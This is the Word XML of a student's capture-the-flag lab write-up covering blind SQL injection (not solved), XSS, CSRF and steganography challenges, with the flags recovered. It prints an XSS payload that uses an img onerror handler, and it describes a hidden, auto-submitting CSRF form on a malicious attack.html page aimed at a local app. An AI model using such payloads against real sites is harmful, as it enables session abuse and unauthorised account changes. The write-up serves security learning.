      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>client_vault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B4AA33" w14:textId="78E468F4" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB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6D9B42F6" wp14:editId="4DFB0F81">
            <wp:extent cx="5498275" cy="3098066"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="14277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6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85" cy="30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B56" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3">
      <w:pPr>
        <w:rPr>
          <w:bCs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3634"/>
      </w:tblGrid>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00CE476B" w14:paraId="10D39EF8" w14:textId="6332B326" w:rsidTr="00B55082">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FF5E65D" w14:textId="3646FDCB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3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B0F9E09" w14:textId="5C7088C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 xml:space="preserve"> CORRECT?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00CE476B" w14:paraId="4E1E2882" w14:textId="112E81F5" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73819AD7" w14:textId="200DAC52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Keep_looking_elsewhere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403C60CE" w14:textId="72CFED6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1F16A491" w14:textId="675A9FA4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50002FA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Not_the_real_flag_here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1AAB4A7F" w14:textId="5BC0141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74C2331" w14:textId="38559D8A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6AA9287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Nice_try_Kiddo_Now_try_next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478981D6" w14:textId="306E4108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YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00CE476B" w14:paraId="6A103EF5" w14:textId="0146CC42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1902945F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false_3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1416A777" w14:textId="6FBA5E4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ABC70C0" w14:textId="44234F81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4E0A3047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ture_3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19ADF3F3" w14:textId="56952E3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</w:tbl>
    <w:p w14:paraId="123C55E8" w14:textId="5BF4A9C3" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3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FDA5D8F" wp14:editId="7628CB69">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="8778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1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62E" w14:textId="77777777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72448AA6" w14:textId="77777777" w:rsidR="00610957" w:rsidRDefault="009F235B" w:rsidP="00DB0B15">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc215147290"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB0B15" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00DB0B15" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>It's a blind SQL.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="00DB0B15" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EACEF8E" w14:textId="16A27A8F" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="00DB0B15" w:rsidP="00610957">
      <w:r w:rsidRPr="00CE476B">
        <w:t>It doesn't</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t>show error msg, or</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t>expected</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t>query upon</w:t>
      </w:r>
      <w:r w:rsidR="0060191D" w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t>injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72059A12" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2876245C" w14:textId="77777777" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="009F235B" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404F6265" w14:textId="69FDE78B" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="009C74C2" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>I couldn’t do this one and I think I forgot to push my attempts of this one lol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F78F5A" w14:textId="59DE8F01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0230ACA0" w14:textId="66A2303C" w:rsidR="00637DCA" w:rsidRDefault="009F235B" w:rsidP="008A2D80">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc215147291"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>(XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00E30DC3" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00637DCA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="6F32ABA2" w14:textId="73FB13BA" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="00E30DC3" w:rsidP="00637DCA">
      <w:r w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:t>The site features a public</w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:t>comment or</w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:t>feedback</w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:t>section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A210110" w14:textId="77777777" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="009F235B" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FFCDD6" w14:textId="77777777" w:rsidR="00F02B32" w:rsidRPr="00CE476B" w:rsidRDefault="00F02B32" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45BDC053" w14:textId="1881A58E" w:rsidR="00F02B32" w:rsidRPr="00CE476B" w:rsidRDefault="00F02B32" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Honestly this one just worked with anything…</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>it tried both</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>message :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">message: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>="alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>window.challengeFlags.xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>)"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>and got the same flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Nothig_is_for_free</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAACD1A" w14:textId="77777777" w:rsidR="00C72DCE" w:rsidRPr="00CE476B" w:rsidRDefault="00C72DCE" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CAB6849" w14:textId="77777777" w:rsidR="00C72DCE" w:rsidRPr="00CE476B" w:rsidRDefault="00C72DCE" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Here's the screenshots of me testing it out and confirming the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A45B8B" w14:textId="4F20E985" w:rsidR="00C72DCE" w:rsidRPr="00CE476B" w:rsidRDefault="00C72DCE" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180B6508" wp14:editId="16CC919D">
            <wp:extent cx="5928360" cy="3337560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="148729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8CC" w14:textId="77777777" w:rsidR="00C72DCE" w:rsidRPr="00CE476B" w:rsidRDefault="00C72DCE" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F77813B" w14:textId="76FB1458" w:rsidR="00C72DCE" w:rsidRPr="00CE476B" w:rsidRDefault="00C72DCE" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194862F1" wp14:editId="17688CA1">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="192509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8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577C" w14:textId="0CAE4A80" w:rsidR="00CE476B" w:rsidRPr="00CE476B" w:rsidRDefault="00CE476B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F8254" w14:textId="153FB13A" w:rsidR="00CE476B" w:rsidRPr="00CE476B" w:rsidRDefault="00CE476B" w:rsidP="00960636">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc215147292"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">05 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t>CSRF Task – Cross-Site Request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t>Forgery (CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="317791C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nspected the vulnerable page using Browser Developer Tools (Elements/Sources).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320612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dentified a hidden &lt;script&gt; block that exposed the flag directly on the client side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3BD130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 xml:space="preserve">Recovered the flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Security_is_illusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD4E4DF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Demonstrated the CSRF exploit by creating a malicious attack.html page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D0EF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The malicious page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C13C5F1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Displays an innocent-looking message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D6879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Contains a hidden POST form targeting http://localhost:5000/csrf/update-email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABDAD17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Auto-submits the form when the user clicks anywhere on the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A641F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Screenshots included:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D8F2D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visible front-end interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB802C3" w14:textId="262DAE36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35F056FE" wp14:editId="7BB5B237">
            <wp:extent cx="4621576" cy="2602633"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1393174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13" cy="26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E495" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EE22DA" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRPr="00CE476B" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36AA8126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&lt;script&gt; section containing the exposed flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C266144" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB865DC" w14:textId="0B082C0F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D64736" wp14:editId="0EC376EA">
            <wp:extent cx="4649118" cy="2618143"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1665289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7" cy="26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E0C" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRPr="00CE476B" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46295370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hidden CSRF attack form inside attack.html.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4C3532" w14:textId="3CCCEFC1" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF2B405" w14:textId="77777777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2D4BD74" wp14:editId="17721605">
            <wp:extent cx="5111827" cy="2878717"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="198027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DCD" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1AF1A7" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B57048" w14:textId="6DD2294F" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF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Flag submitted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>succesfully</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E8495A1" w14:textId="1EC6C25B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2EABC1" wp14:editId="6A4773F3">
            <wp:extent cx="4759287" cy="2680185"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="1756204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15" cy="26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A4B8" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRPr="00CE476B" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A72D837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Concluded that the application lacked proper CSRF protection and leaked sensitive data in the frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156CDA75" w14:textId="77777777" w:rsidR="00DB0B15" w:rsidRPr="00CE476B" w:rsidRDefault="00DB0B15" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1051E9" w14:textId="77777777" w:rsidR="00DB0B15" w:rsidRDefault="00DB0B15" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF369FE" w14:textId="77777777" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602CC172" w14:textId="300617C2" w:rsidR="005409F1" w:rsidRDefault="005409F1">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA2778" w14:textId="29F40A1C" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc215147293"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>06 Bonus Task – STEG (Stenography)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4C11E82A" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1"/>
    <w:p w14:paraId="0DF2BDFD" w14:textId="77777777" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve">Downloaded the provided image file </w:t>
      </w:r>
      <w:r w:rsidRPr="005409F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>download.png</w:t>
      </w:r>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve"> from the challenge portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5489565B" w14:textId="76F352B7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1BB4A076" wp14:editId="1287034C">
            <wp:extent cx="4680284" cy="2632660"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="650202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8" cy="26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227" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346F432B" w14:textId="77777777" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005409F1">
        <w:t>Verified the file type and basic structure (PNG header visible when opened in text viewer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272912A1" w14:textId="15CD02AE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0D01DEE3" wp14:editId="66638234">
            <wp:extent cx="5239753" cy="2947361"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="16730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75" cy="29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A07C" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B708991" w14:textId="34DB6E43" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005409F1">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Introduced the concept of </w:t>
      </w:r>
      <w:r w:rsidRPr="005409F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>steganography</w:t>
      </w:r>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve"> — hiding information inside image files using metadata, pixel data, or embedded text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBBBCDF" w14:textId="01816384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5EC01212" wp14:editId="0AD34750">
            <wp:extent cx="5239753" cy="2947361"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1311068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29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0B2" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="175A4D87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 xml:space="preserve">Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005409F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve"> to inspect the image’s metadata and hidden fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D0350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>Checked for non-standard fields, embedded comments, or unusual metadata entries that could contain the hidden flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51551B02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 xml:space="preserve">Prepared screenshots of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005409F1">
        <w:t>exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
